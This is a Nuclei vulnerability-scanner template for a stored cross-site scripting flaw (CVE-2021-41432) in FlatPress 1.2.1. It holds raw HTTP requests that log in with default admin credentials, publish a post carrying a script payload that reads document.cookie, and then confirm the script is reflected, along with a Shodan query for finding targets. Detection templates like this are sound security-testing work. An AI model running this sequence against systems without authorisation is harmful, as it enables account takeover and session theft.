nuclei-templates/cves/2021/CVE-2021-41432.yaml

61 lines
1.8 KiB
YAML

id: CVE-2021-41432
info:
name: FlatPress 1.2.1 - Cross-site scripting (XSS)
author: arafatansari
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41432
metadata:
shodan-query: http.html:"Flatpress"
verified: "true"
tags: xss,cve,2021
requests:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="pass"
password
------WebKitFormBoundarykGJmx9vKsePrMkVp
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundarykGJmx9vKsePrMkVp--
- |
POST /admin.php?p=entry&action=write HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce=4150bd5fe5&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish
- |
GET /index.php/2022/10/10/abcd/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(document.cookie)</script>"
condition: and